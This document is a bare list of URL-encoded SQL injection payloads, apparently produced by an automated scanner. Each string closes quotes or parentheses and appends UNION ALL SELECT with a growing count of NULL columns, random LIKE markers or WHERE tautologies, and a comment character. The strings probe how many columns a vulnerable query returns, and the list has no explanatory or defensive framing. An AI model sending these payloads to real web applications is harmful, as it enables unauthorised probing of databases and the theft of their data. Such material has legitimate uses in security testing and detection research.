1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22ukxe%22%20LIKE%20%22ukxe 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22tArL%22%20LIKE%20%22tArL 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22SNDf%22%20LIKE%20%22SNDf 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22aswJ%22%20LIKE%20%22aswJ 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22SmBX%22%20LIKE%20%22SmBX 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22zGLE%22%20LIKE%20%22zGLE 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22RYnJ%22%20LIKE%20%22RYnJ 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22HUbf%22%20LIKE%20%22HUbf 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22aFTf%22%20LIKE%20%22aFTf 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22pLZu%22%20LIKE%20%22pLZu 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22SNVf%22%20LIKE%20%22SNVf 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22LJUd%22%20LIKE%20%22LJUd 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22RTDt%22%20LIKE%20%22RTDt 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22heqS%22%20LIKE%20%22heqS 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ZhMY%22%20LIKE%20%22ZhMY 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22iWZL%22%20LIKE%20%22iWZL 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22lPhM%22%20LIKE%20%22lPhM 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ZuAv%22%20LIKE%20%22ZuAv 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22aSLA%22%20LIKE%20%22aSLA 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22IsJO%22%20LIKE%20%22IsJO 1%29%20WHERE%202145%3D2145%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%205055%3D5055%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%201393%3D1393%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%203205%3D3205%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%206868%3D6868%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%207698%3D7698%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%201967%3D1967%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%203331%3D3331%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%202299%3D2299%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%206125%3D6125%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%209211%3D9211%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%206005%3D6005%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%208826%3D8826%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%201663%3D1663%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%205172%3D5172%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%205736%3D5736%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 